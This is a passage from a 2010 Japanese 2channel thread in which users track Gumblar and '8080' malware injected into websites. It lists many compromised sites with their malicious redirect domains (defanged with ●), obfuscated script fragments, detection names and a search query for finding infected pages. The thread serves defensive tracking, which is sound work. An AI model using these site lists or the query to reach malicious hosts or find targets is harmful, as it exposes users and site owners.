なんでもかんでもクリッコするやつは
パソコンを使わない方がいいと思うw

635:名無しさん@お腹いっぱい。
10/04/07 17:58:48
ABP 1.1.3ですけど

|URLリンク(*:8080*)

でおk?


636:名無しさん@お腹いっぱい。
10/04/07 20:26:56
>>650
URLリンク(www.aguse.jp)
URLリンク(www.aguse.jp)

阿斗ちゃん増殖中…

URLリンク(rd.or.tp)
ここ出てたかな

637:名無しさん@お腹いっぱい。
10/04/07 20:35:09
ごめんミス
>>625でした・・・


638:コテハン ◆8080adndqg
10/04/08 04:45:37
新コードに絶賛更新中
【陥落サイトのURL悪用厳禁】
fleur●webinfo●jp → loadtube●ru:
dog-g-club●com → helphomecare●at:
f39●aaa●livedoor●jp/~miyui/archives/cat3/cat10/index●html → helphomecare●at:
miyagi●007champagne●biz/asobo → youhelpnow●ru:
dxenglish●value-net●net/index●html → bestdarkstar●info:
--
発掘中にみつけた8080じゃないやつ
www●bestofunder●com/ ←アクセス注意

639:名無しさん@お腹いっぱい。
10/04/08 20:11:40
8080ではなく懐かしのGumblar.xちゃん
moebox●com/main●html

たぶんもっと前から改ざんされてたとおもうけど一応貼っとく
Last-Modified: Sun, 04 Apr 2010 23:20:30 GMT

640:名無しさん@お腹いっぱい。
10/04/08 20:15:26
でもドメインが新しいのかこれ
.irってイランか
初めて見たわ

641:名無しさん@お腹いっぱい。
10/04/08 20:20:54
>>639追記
aguseのソースをまとめてDLしてくれるの便利だね
/js/table.js や /js/lk.js にてんこ盛りされてて吹いた

642:名無しさん@お腹いっぱい。
10/04/08 20:24:58
ずっと修正されないまま更新され続けてるっぽいなあ
同じURLが連続してるとこから手動ではなく自動っぽいことが伺える
まあLast-Modified: も近い時間になってるしね

643:名無しさん@お腹いっぱい。
10/04/09 00:29:25
>>638
注意のURLを踏んでしまったOTZ
とあるインドの”コンピューターの危険にさらされる”サイトに飛ばされた

ちょうしこいて踏むんじゃなかったぉ・・・

644:名無しさん@お腹いっぱい。
10/04/09 00:43:16
www●bestofunder●com/
↓2ヶ所に飛ばされる
zeneey●com/email/znystyle.phpとzeneey●com/は踏んでしまったOTZ
nt01●co●in/3 はセクルチーが防いで踏まずに済んだみたい…

zeneey●com/は感染サイトだから、今月中にOSの再インストールするぉ!





645:名無しさん@お腹いっぱい。
10/04/09 15:42:26
>>622
> <!--562ba23ffcf28efa4f71fc787258d3d3-->
> <!--e62178df1fa90a28d1b2efa8443ab220-->
> 謎の文字列が謎...

この文字列が有る無しでもセキュリティベンダーによっては検出しない場合があるね。
つか、avast!対応早杉、頑張り過ぎだろw

646:名無しさん@お腹いっぱい。
10/04/09 16:56:34
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)

きゅ~い!きゅ~い!(キリッ

647:コテハン ◆8080adndqg
10/04/09 18:05:56
【陥落サイトのURL悪用厳禁】
www●ferahdondurma●com ← アクセス注意!
※改竄されすぎててよくわからんw

neta-script●lionking●jp/ (.at:8080/)
8080系のスクリプトが最大の仕込み?


携帯オンリーで掘るのは厳しいゾ・・・とw


648:名無しさん@お腹いっぱい。
10/04/09 18:28:30
ところでなんでVTのスキャンに使われているカスペってバージョン古いんだ?
VTのスキャン結果でカスペがスルーして「ウイルス検出できない!カスペオワタ!」
って言われるのはカスペ信者としては見過ごせないのだが。

649:名無しさん@お腹いっぱい。
10/04/09 19:58:33
面倒くさいからじゃないか?w

650:名無しさん@お腹いっぱい。
10/04/09 20:26:57
>>647
だれうまw

www●e-tokunaga●co●jp/contents/house_dock/index●html
www●vericapandilovska●com●mk/
this●is/ausgot/
at:8080

capvex●com
egujarat●net
info:8080

reagold●com
カスペに蹴られた…ウイルスか?

651:コテハン ◆8080adndqg
10/04/09 20:43:45
>>650
>reagold●com
色々仕込んであるというか・・・元のページの面影が無いw

・<!-- ad -->
・Gumblarっぽいやつ
・var I={j・・・
・var Il1I1111I1=function

652:名無しさん@お腹いっぱい。
10/04/09 20:57:46
www●e-tokunaga●co●jp/pc/free06●html

653:名無しさん@お腹いっぱい。
10/04/09 21:20:17
動画って見るのめんどいよなあ
LACCOTV: 「Gumblarの脅威!新たな危険挙動を追跡中!」
URLリンク(www.youtube.com)

654:名無しさん@お腹いっぱい。
10/04/10 02:13:31
>>621
> bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか?

JREのアップデート通知でしょ。
Java 新版登場。27 種類の欠陥が修正されている。
URLリンク(www.st.ryukoku.ac.jp)


655:名無しさん@お腹いっぱい。
10/04/10 02:24:41
Javaの実行プログラムが呼ばれてタスクトレイにでてきたんじゃないの

656:名無しさん@お腹いっぱい。
10/04/10 05:48:47
すみません教えてください
見たいサイトがあってグーグルのキャッシュというところをおして見ようとしたら
avastに警告され、キャッシュのURLを入れてチェッカーに掛けたら
外部へリダイレクトされていますと赤字で出ましたが
マルウェアが検出されないと出ます。
これってウイルスサイトではないってことですか?

657:名無しさん@お腹いっぱい。
10/04/10 05:50:03
見たかったサイトはur-chintai.infoというところです。

658:名無しさん@お腹いっぱい。
10/04/10 07:44:59
>>657
仮想マシン一台作って見にいってみたけど
403エラーで何も見れません。
心配なら、OSの再インストールを勧めます。


659:名無しさん@お腹いっぱい。
10/04/10 07:46:34
ur-chintai.infoは以前ガンブラーに感染してたんだよ
今はアクセスできない
キャッシュは感染してる

660:名無しさん@お腹いっぱい。
10/04/10 09:35:40
すいません、ガンブラーって手動削除可能でしょうか?
なんかウィルスバスター起動しなくて、、、

661:名無しさん@お腹いっぱい。
10/04/10 10:14:53
www●geocities●jp/owari_ka_ra/
www●geocities●jp/o_tweb/
www●geocities●jp/shimilw/

662:名無しさん@お腹いっぱい。
10/04/10 10:17:36
>www●geocities●jp/owari_ka_ra/
懐かしのCODE1

663:名無しさん@お腹いっぱい。
10/04/10 10:18:27
>>658
>>659
ありがとうございました。感染してたur-chintai.●infoはなくなったのに
キャッシュで感染するんですね・・・
avastでHDD検査して一応ウイルスなかったのですが
カスペでもやって見つかったら再インストールします・・・


664:名無しさん@お腹いっぱい。
10/04/10 10:19:48
>>663
avastが防いでくれたから問題ないだろ

665:名無しさん@お腹いっぱい。
10/04/10 10:42:06
www●kyoudoumusen●jp

666:名無しさん@お腹いっぱい。
10/04/10 11:00:03
freett●com/takarafune
www●tirashi●jp/ ここも全然対処しない

667:名無しさん@お腹いっぱい。
10/04/10 11:11:09
ss-gaido●info

668:名無しさん@お腹いっぱい。
10/04/10 11:12:02
ふりちけは存在自体がウイルス(広告的な意味で)

669:名無しさん@お腹いっぱい。
10/04/10 12:22:19
avastスレより
partsdepot●jp/

670:名無しさん@お腹いっぱい。
10/04/10 13:52:37
チキンな私のかわりにどなたかよろしく。。
www●gozaisho.co●jp

右下に「やんちゃ爆弾」てのが出ていて、難読化されています。
ググってみたら、やんちゃ爆弾自体はブログパーツのようなんですが、
ロープウェイの公式サイトにこんなオモチャを仕掛けるって、普通の企業なら
あり得ないと思うのですが。
そもそも、難読化する必要性がないですよね。他の部分は普通に読める
アドレスで貼ってあるのに、openの部分のみ。

既存のものを利用した新たな改竄ってことはないですか?
それともこれが普通の形態?

考えてみたら、ブログパーツ部分に仕掛けられたら、危険性認識せずに
押してしまう人はたくさんいそうだ。。

671:名無しさん@お腹いっぱい。
10/04/10 14:16:56
>>670
解読結果

     *      *
  *  うそです   +  
     n ∧_∧ n
 + (ヨ(* ´∀`)E)
      Y     Y    *

wwwwww

672:名無しさん@お腹いっぱい。
10/04/10 14:31:47
>>660
無理
セキュリティソフトが起動しない時点でいろいろやられてるってことです
OS入れなおしましょう

673:名無しさん@お腹いっぱい。
10/04/10 14:35:08
>>663
キャッシュなら安全とおもうほうがおかしいよ
単純に考えてコードをそのまま保存するんだから攻撃スクリプトも保存されるでしょ

674:名無しさん@お腹いっぱい。
10/04/10 15:05:31
1994年生まれの人集まれ!★3
スレリンク(nendai板)

675:名無しさん@お腹いっぱい。
10/04/10 15:41:51
>>674
マルチ死ね

676:名無しさん@お腹いっぱい。
10/04/10 15:47:05
やっぱavast入れとくか

677:名無しさん@お腹いっぱい。
10/04/10 16:28:00
何使おうがやるべき事やっていれれば今のところは感染のしようもないけどな。

678:名無しさん@お腹いっぱい。
10/04/10 16:50:37
>>2の対策だけで心配なら以下の変更もやっておく可
Internet Explorer で ActiveX コントロールの動作を停止する方法
URLリンク(support.microsoft.com)
Java Runtime Environment
URLリンク(this.is)

679:名無しさん@お腹いっぱい。
10/04/10 16:59:16
下のURLあやしすぎわろた

680:650
10/04/10 17:09:46
>>678
俺の貼った陥落サイトのURL使ってんじゃねーよクソが
URLリンク(www.aguse.jp)

681:名無しさん@お腹いっぱい。
10/04/10 17:17:18
>>680
管理者氏名がパッと見Gumblarに見えたwww

682:コテハン ◆8080adndqg
10/04/10 18:23:06
>>670
ここは鑑定スレではありませぬ。

>>678
下段のURLは8080系の陥落サイト。
easyfunguide●at:8080/

「陥落サイトが増える(かもしれない)」から
遊びで貼るのはやめましょう。


683:名無しさん@お腹いっぱい。
10/04/10 23:49:47
URLリンク(www.avast.com)
JS:Illredir-AQ(=8080)の増え方が激しい…本日の検出数は上から5番目
盛大に拡散中ですなwww

684:名無しさん@お腹いっぱい。
10/04/11 02:57:32
ここで話していいかわからんけどgredのURL入力欄で http:// ってのいらなくね?
消すのメンドイ

685:コテハン ◆8080adndqg
10/04/11 03:39:09
【陥落サイトのURL悪用厳禁】
jyo●eisuku●com/home/
adgaw●com/lovesheet/index●html
www●borneomarathon●com/jpn/home●html ←旧型

けんさくわーど:"new String();" "new Date();" "new Array();" -JAVA -JAVAScript
site:jp の検索結果 約 160 件
site:cn の検索結果 約 490 件
site:ru の検索結果 約 1,860 件 ←www

686:名無しさん@お腹いっぱい。
10/04/11 03:46:13
お前らなんでこんな詳細にウイルス分析してんだよww
セキュリティベンダーに就職しろwww

687:名無しさん@お腹いっぱい。
10/04/11 06:22:17
www■tirashi■jp/
トップはメンテ中になってるが他のページがネット上に残ったまま
www■tirashi■jp/tmp/flyer_zooma/ZcyyxafVGp_129/

688:名無しさん@お腹いっぱい。
10/04/11 07:05:13
www■niaufuku■com/sense_up/index■htm
書き込みに失敗しているところが掛ったと思ったら
www■niaufuku■com/index■htm
他のページは成功してるらしい。

bag■fukunekodo■com/mindex/ 携帯向けのサイト
と思ったらfukunekodo■com/ 上にあるサイトが全部やられてるっぽい

wagashi■fukunekodo■com/index/
shochu■fukunekodo■com/index/
nihonshu■fukunekodo■com/index/
sweet■fukunekodo■com/index/
cosme■fukunekodo■com/index/
make■fukunekodo■com/index/
car■fukunekodo■com/index/
mens■fukunekodo■com/index/
pc■fukunekodo■com/index/
baby■fukunekodo■com/index/
diet■fukunekodo■com/index/ たぶん他にもあると思う

失敗?
inner■fukunekodo■com/index/
fashion■fukunekodo■com/index/
acces■fukunekodo■com/index/
golf■fukunekodo■com/index/
meet■fukunekodo■com/index/
bekkan■fukunekodo■com/index/ 

どっちもru:8080

689:名無しさん@お腹いっぱい。
10/04/11 09:10:08
>>665
ホームページ制作会社
Collco - 株式会社コルコ
URLリンク(www)<)

世もまつだww

690:名無しさん@お腹いっぱい。
10/04/11 09:13:54
コルコ倒産しろ

691:名無しさん@お腹いっぱい。
10/04/11 10:18:20
>>689
世も末(すえ)な
日本語は正しく使いましょう

692:名無しさん@お腹いっぱい。
10/04/11 10:29:28
マジにネタレスカッコイイ

693:名無しさん@お腹いっぱい。
10/04/11 11:17:06
>>688 fukunekodo●com
絞り込んでみた
URLリンク(search)●yahoo●co●jp/search?p=site%3Afukunekodo●com%2F+%22function%22&ei=UTF-8&fr=top_ga1_sa&x=wrt
検索結果 約193件(多少の巻き込み有)

>>689
www●collco●jp/
↓巻き込み改竄↓
www●kyoudoumusen●jp/

/(^o^)\やっちまった
・・・ということだなw

694:名無しさん@お腹いっぱい。
10/04/11 11:33:44
>>693
fukunekodoひどいな

コルコはorz×100000000000

695:650
10/04/11 11:52:00
利用されるくらいならやめちまえと書き込みを控えるつもりでいたが、
ちょっと気になったので賢明な諸兄の判断を仰ぎたく・・・

URLリンク(www.aguse.jp)
> www●saidenterprise●com:2095/login/

ウイルスかな?
違ってたらすまない、本当に少し気になっただけなんだ

696:名無しさん@お腹いっぱい。
10/04/11 12:24:52
>>695
www●aparajeyo●org/index●php
avastが反応、JS:Illredir-AL

絶賛崩壊中w
ソース見た限りでは.ru:8080だな
下のアドレスはどこから?

697:696
10/04/11 12:27:40
と思ったら下にあったのかorz
Web Mailって書いてあるから、ポート2095はたぶん関係ないと思う

698:650
10/04/11 12:38:41
>>696
すまない、ありがとう

699:コテハン ◆8080adndqg
10/04/11 13:50:02
【陥落サイトのURL悪用厳禁】
www●nadara●jp ←途中で切れてる
npo-aichi●or●jp/ ← \(^o^)/
creole●jp/
kumarin●biz/


700:696
10/04/11 14:19:24
npo-aichi
4発(本文3発.js1発)仕込みwww

しかし何で途中で切れたりするんだろ

701:650
10/04/11 14:51:08
www●amakusaturigu●com
hrhr●sakura●ne●jp ←ブログ?

>>700
それはいつも思う、どうしてだろうね?

702:名無しさん@お腹いっぱい。
10/04/11 14:57:58
650のままだった事と、>>636で未来の自分に安価打ってた事に
今頃気が付いたw

名無しさんに戻りますね

703:名無しさん@お腹いっぱい。
10/04/11 16:57:31
加速度的に被害広がってるのに、話題的にはどんどん静まってきてるのはなんでだろう
現実逃避?

704:名無しさん@お腹いっぱい。
10/04/11 16:58:08
URLリンク(headlines.yahoo.co.jp)

そういえば、cmsツールの脆弱性とか聞いた覚えがあったw

705:名無しさん@お腹いっぱい。
10/04/11 18:06:18
iner●kz/index2●php

Googleにリダイレクト
77●221●153●178/go2/in●phpの代替かも…よく判らない


>>703
対策取っとけば怖くない現実に辿り着いたんだよきっとw

誰も感染しなくなって、ガンブラーが廃れて、このスレも要らなくなる
それが何より望ましい事なんだからそれはそれで良い結末だけどね

>>704
これ以降の話?
URLリンク(www.itmedia.co.jp)

706:名無しさん@お腹いっぱい。
10/04/11 18:40:42
>>705
前にHP作成会社に聞いた話で
複数のHPを管理していて改竄されたのが一つだけ
自動更新するソフトを使ってるHPだけが改竄されたとか
IPAと警察庁に報告する様お願いしたけど

んで、今日同じ様な話しを聞いて思い出したw

707:名無しさん@お腹いっぱい。
10/04/11 21:17:09
>>703
対策や予防方法が広く認知されるようになったからだろう。
わかっていても検証コスト等の理由で後手に回っているサーバの改ざんは広がっていても
閲覧するだけの個人ユーザに被害が及ばなくなれば話題としては収束するさ。

708:コテハン ◆8080adndqg
10/04/11 21:41:42
>>700
npo-aichiはサイト内全滅でござる
/content/include/xoops●js
/content/modules/xhld0/phpdate●js
/content/modules/xhld1/phpdate●js
/content/modules/xhld2/phpdate●js
/content/modules/xhld3/phpdate●js
jsも全滅w



次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch